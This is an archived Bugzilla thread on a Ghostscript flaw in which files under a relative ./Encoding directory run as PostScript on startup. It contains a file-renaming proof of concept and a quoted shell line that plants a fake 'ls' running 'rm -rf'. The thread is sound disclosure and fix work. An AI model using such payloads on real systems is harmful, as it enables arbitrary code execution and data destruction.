[Bug 608071] New: Ghostscript executes random code on startup
Encoding/pwnd
http://bugzilla.novell.com/show_bug.cgi?id=608071 http://bugzilla.novell.com/show_bug.cgi?id=608071#c0 Summary: Ghostscript executes random code on startup Classification: openSUSE Product: openSUSE 11.2 Version: Final Platform: x86-64 OS/Version: openSUSE 11.2 Status: NEW Severity: Critical Priority: P5 - None Component: Printing AssignedTo: jsmeix@novell.com ReportedBy: giecrilj@stegny.2a.pl QAContact: jsmeix@novell.com Found By: --- Blocker: --- User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 The following script changes the name of file ./test.ps in the current directory to ./pwnd.ps. The attack is performed by a hidden Ghostscript configuration file that should not be treated as a configuration file at all. Steps 1 and 2 are needed only once; indeed, if you have ./Encoding/* for any reason, Ghostscript will execute code from there, and the results will range from annoying to pernicious. The example attack renames a single file; real haxorz are invited to read files or delete them. The script creates ./Encoding for demonstration purposes; if you happen to have any file in ./Encoding/ or $GS_LIB/Encoding, you are PWND each time you run gs. Reproducible: Always Steps to Reproduce: 1. mkdir Encoding 2. echo '(PWND BY ARTIFEX HAXORZ\n) print (test.ps) (pwnd.ps) renamefile quit' 3. gs Actual Results: GPL Ghostscript 8.64 (2009-02-03) Copyright (C) 2009 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file COPYING for details. PWND BY ARTIFEX HAXORZ While reading gs_fntem.ps: Error: /undefined in --quit-- Operand stack: (gs_fntem.ps) 1 FontEmulationProcs encodingnames --nostringval-- --nostringval-- StandardEncoding --nostringval-- ISOLatin1Encoding --nostringval-- SymbolEncoding --nostringval-- DingbatsEncoding --nostringval-- DingbatsEncoding --nostringval-- StandardEncoding --nostringval-- ISOLatin1Encoding --nostringval-- SymbolEncoding --nostringval-- Wingdings pwnd pwnd Encoding Execution stack: %interp_exit --nostringval-- --nostringval-- --nostringval-- %array_continue --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push --nostringval-- 1831 17 5 %oparray_pop --nostringval-- --nostringval-- --dict:17/21(ro)(G)-- --dict:2/2(G)-- --nostringval-- 1 %dict_continue --nostringval-- --nostringval-- 1829 26 5 %oparray_pop findresource %errorexec_pop --nostringval-- --nostringval-- --nostringval-- --nostringval-- 1220188 pwnd 27 --nostringval-- --nostringval-- false 1 %stopped_push 1755 27 6 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- 1820 26 6 %oparray_pop 1754 26 6 %oparray_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- Dictionary stack: --dict:963/3371(G)-- --dict:0/20(G)-- --dict:63/200(L)-- --dict:963/3371(G)-- --dict:10/10(G)-- --dict:17/21(ro)(G)-- Current allocation mode is global The file test.ps is renamed to pwnd.ps Expected Results: Ghostscript should not read ./Encoding/* on startup and start normally. It should not rename any files (unless asked to do it by the user's script). Here is what Artifex has to say: We really do not care about the reporter's opinion or curiosity. A simple "Thank you" is sufficient. Any further comment on this bug report will result in the reporter's account being banned. You have been warned. URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316 -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c
Johannes Meixner
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c1
Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c2
Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c3
Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c4
--- Comment #4 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c5
--- Comment #5 from Christopher Yeleighton
(In reply to comment #2)
This is what I've explained: only the user can shoot into its feet.
That means the user should not execute Ghostscript in any directory that has a nonempty Encoding subdirectory (that may be needed for sb/sth else). Why do you call that "shooting into its feet"? The user need not create the Encoding directory itself, she can just stumble upon it. Also, upstream will not do anything about this because they take me for a troll; however, they explicitly stated that they would reconsider given positive feedback from a distro. -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c6
--- Comment #6 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c7
--- Comment #7 from Christopher Yeleighton
(In reply to comment #5)
Not only ghostscript but also using the `.' in the personal PATH is a simple problem. Suppose that the user does a
cd /tmp ls
and now suppose an other user had done
echo -e '#!/bin/sh\ncd\nrm -rf .' > /tmp/ls chmod 755 /tmp/ls
... do you see the problem of having `.' at first place within the execution path?
I do not have . in $PATH and I would know how to remove it if I had one. It is not the case with GhostScript: I am exposed and I have no means of preventing it. The various risky directories you cite are just that --- a bunch risky directories. However, with GhostScript, _any_ directory is risky. Chris -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c8
--- Comment #8 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c9
--- Comment #9 from Christopher Yeleighton
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c10
Thomas Biege
Ghostscript_8.64 on openSuSE_11.2 executes all files matching ./Encoding/* on startup. This search is relative to the current directory so it is easy to poison Ghostscript and cause it to execute arbitrary PostScript code without user action or knowledge.
Details: URL:https://bugzilla.novell.com/show_bug.cgi?id=608071
Interesting! So if someone creates /tmp/Encoding then it is dangerous to do cd /tmp; gs any.ps I now used: strace -omylog gs grep '"\./' mylog | sort -u and that shows that gs tries many files in currrent directory, "protection" against just ./Encoding is not enough. Cheers, Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c11
--- Comment #11 from Thomas Biege
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c14
--- Comment #14 from Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c15
Johannes Meixner
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c
Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c16
--- Comment #16 from Ludwig Nussel
[...] Furthermore http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583316#10 ------------------------------------------------------------------ I have been using a wrapper around gs that sets both -P- -dSAFER. That seems to work fine for viewing PS files, but does NOT allow gv to work for PDFs ------------------------------------------------------------------- indicates that we should pay particular attention if "-P-" becomes our default whether or not Ghostscript then still works for PDFs.
The mistake in that wrapper is to add -dSAFER always. $ cat ~/bin/gs #!/bin/sh set -- -P- "$@" echo "$@" exec /usr/bin/gs "$@" $ gv /tmp/uebung01.pdf -P- -dNODISPLAY -dQUIET -sPDFname=uebung01.pdf -sDSCname=/tmp/gv_4bff90b8_1_uebung01.pdf.tmp pdf2dsc.ps -c quit For PDFs gv actually calls gs to execute a postscript program. That program is from ghostscript itself so no need for -dSAFER there. -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c17
--- Comment #17 from Christopher Yeleighton
Aha! So the root of the problem is that -dSAFER isn't honored for those initialization files.
The root of the problem is that Ghostscript insists on reading encodings up front, and assumes that whatever is in an Encoding directory is an encoding program. If we accept this, although I really do not think we should, the root of the problem is that Ghostscript allows relative path search in its initialization phase. -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c18
--- Comment #18 from Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c19
--- Comment #19 from Christopher Yeleighton
The -P- option doesn't work for gs_init.ps: http://bugs.ghostscript.com/show_bug.cgi?id=691350
There are three problems with -P-. 1. It is not obvious, and most users will not know. 2. It also changes the way Ghostscript handles command-line arguments, and the vendor claims that Ghostscript users have vehemently protested against that. 3. Short of recompiling, there is no way to configure Ghostscript to use -P- by default. In particular, it cannot be applied as a per-user policy. It is a big gun to shoot at such a small target, and the cure kills both the infection and the patient :-) -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c20
Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c21
--- Comment #21 from Petr Baudis
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c22
--- Comment #22 from Christopher Yeleighton
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c23
--- Comment #23 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c24
--- Comment #24 from Ludwig Nussel
Just to be noted: we have 121 packages which requires ghostscript-library therefore I would like to set SEARCH_HERE_FIRST=0 in the main makefile of ghostscript. Beside the problem with gs_init.ps this cause that no file from current working directory will be read. That will break
Files from the current directory are read despite -P- (ie SEARCH_HERE_FIRST) even on sles10 so that problem probably only hits very old ghostscripts. Maybe the fix for reading files specified on the command line from the current directory is the cause for the problem with gs_init.ps? -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c25
--- Comment #25 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c26
--- Comment #26 from Johannes Meixner
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c28
--- Comment #28 from Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c29
Michal Marek
Just to be noted: we have 121 packages which requires ghostscript-library therefore I would like to set SEARCH_HERE_FIRST=0 in the main makefile of ghostscript.
Do you have a test package somewhere so that we can try a build against it? -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c30
--- Comment #30 from Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c31
--- Comment #31 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c32
--- Comment #32 from Christopher Yeleighton
(In reply to comment #14)
Aha! So the root of the problem is that -dSAFER isn't honored for those initialization files.
The root of the problem is that Ghostscript insists on reading encodings up front, and assumes that whatever is in an Encoding directory is an encoding program.
If we accept this, although I really do not think we should, the root of the problem is that Ghostscript allows relative path search in its initialization phase.
Correct me if I am wrong but the information supplied upstream [1] seems to indicate that Ghostscript, just like Emacs, does not run its start-up code when it starts with a core ROM image that is prebuilt unless this feature is switched off. This feature can be turned off during build; it is on by default but it is turned off in openSuSE [2]. It seems that Ghostscript should not be vulnerable when it starts off a core image. OTOH, it makes sense for the code in (gs_fntem.ps) to load all possible encodings ONLY IF it is building the start-up image because a safe environment can be assumed at build time. Summary: I hereby suggest that generating and using the core image for Ghostscript should be turned back on. == References == [1] URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316#c7 [2] URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316#c9 -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c33
--- Comment #33 from Stefan Dirsch
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c34
--- Comment #34 from Christopher Yeleighton
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c35
--- Comment #35 from Stefan Dirsch
It should be verified that they do not break when Ghostscript is compiled with SEARCH_HERE_FIRST=0 (as explained in Comment #20). This is the workaround recommended by upstream; however, I think there are milder ways to patch this vulnerability.
Thanks a lot! Are there ghostscript-library packages available for testing? -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c36
Danny Kukawka
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c37
Stephan Kulow
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c38
--- Comment #38 from Christopher Yeleighton
If they do not fail, but silently create broken documentation, it's a big problem with the current timing.
kio_man generates broken documentation and nobody cares. For example, try URL:man:ftp or URL:man:groff_char. -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c39
Johannes Meixner
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c40
--- Comment #40 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c41
--- Comment #41 from Christopher Yeleighton
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9
The following script changes the name of file ./test.ps in the current directory to ./pwnd.ps. The attack is performed by a hidden Ghostscript
This attack works as-is with Okular. In addition, it prevents Okular from rendering anything in the affected directory (of course). -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c42
--- Comment #42 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c43
--- Comment #43 from Ludwig Nussel
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c44
--- Comment #44 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c45
Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c46
--- Comment #46 from Christopher Yeleighton
Created an attachment (id=372862) --> (http://bugzilla.novell.com/attachment.cgi?id=372862) [details] ghostscript-8.70-gs_init.dif
Fix the problem with the gs_init.ps ... only open in current working directory if and only if only the users has write access to the directory
This is likely to be the case when an archive tool creates a temporary directory to store the files to be viewed; it can set the directory to u=rwx only in order to prevent other users from accessing the data. If I understand the patch correctly, it would not block gs_init.ps in such a setting, which is bad. -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c47
--- Comment #47 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c48
--- Comment #48 from Dr. Werner Fink
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c49
Swamp Workflow Management
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c50
Thomas Biege
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c51
Swamp Workflow Management
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c52
Swamp Workflow Management
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c53
Swamp Workflow Management
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c54
Swamp Workflow Management
https://bugzilla.novell.com/show_bug.cgi?id=608071
https://bugzilla.novell.com/show_bug.cgi?id=608071#c55
Swamp Workflow Management
https://bugzilla.novell.com/show_bug.cgi?id=608071
https://bugzilla.novell.com/show_bug.cgi?id=608071#c56
Swamp Workflow Management
https://bugzilla.novell.com/show_bug.cgi?id=608071
https://bugzilla.novell.com/show_bug.cgi?id=608071#c
Swamp Workflow Management
https://bugzilla.novell.com/show_bug.cgi?id=608071
https://bugzilla.novell.com/show_bug.cgi?id=608071#c57
Johannes Meixner
participants (1)
-
bugzilla_noreply@novell.com